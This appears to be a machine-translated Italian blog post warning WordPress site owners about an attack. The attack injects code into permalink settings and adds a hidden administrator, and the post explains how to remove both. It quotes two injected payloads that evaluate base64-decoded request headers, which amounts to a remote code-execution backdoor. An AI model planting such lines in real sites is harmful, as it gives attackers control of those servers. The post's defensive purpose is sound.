Iniezione WordPress SQL - Ultimo attacco

Un sacco di siti sono stati colpiti da un recente attacco SQL in cui i codici vengono iniettati sul tuo sito. Questa iniezione MySQL influenza i tuoi permalink rendendoli inefficaci. Di conseguenza, il tuo blog pubblica URL non funzionerà. Numerosi blog WordPress sono stati presi di mira in questo attacco, grazie a Andy Soward per aver portato questo alla nostra attenzione.

A causa di questo attacco, è stato aggiunto uno dei seguenti codici aggiunti alla struttura del permalink:

% & ($ Eval (base64_decode ($ _ SERVER [HTTP_REFERER])) |. +) &%

“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

Queste citazioni hanno aggiunto tutti i permalink sul tuo sito e possono essere modificati solo se rimossi manualmente.

Per risolvere questo problema vai a:

Impostazioni> Permalink e rimuovi il codice precedente e sostituisci il tuo codice predefinito.

La prossima cosa che devi fare è andare su Utenti. Vedrai che ci sono più di un amministratore. Non vedrai il loro nome elencato, ma vedrai aumentare il numero. Quindi quello che devi fare è guardare tutti gli utenti e trovare l'ultimo che si è registrato. Metti il ​​mouse su quell'utente e ottieni il link. Cambia il codice userid = aggiungendo 1 a quel numero. Quindi se l'ultimo utente che puoi vedere era l'utente n. 2, aggiungilo 1 e fallo 3. Dovresti trovare che l'amministratore nascosto ha un codice strano come nome. Elimina il codice e rendilo un abbonato. Quindi torna e cancellalo.

Questo dovrebbe risolvere il problema. Puoi anche eliminarlo semplicemente andando al tuo PHPMyAdmin. Perché vedrai l'utente lì.

Volevamo solo ottenere queste notizie non appena possibile, in modo che i nostri utenti possano essere aggiornati. Assicurati di controllare che il tuo blog non sia infetto. Speriamo che WordPress uscirà presto con una nuova versione.

Inoltre, se non hai implementato alcune di queste misure per proteggere la tua Area Amministrativa di WordPress.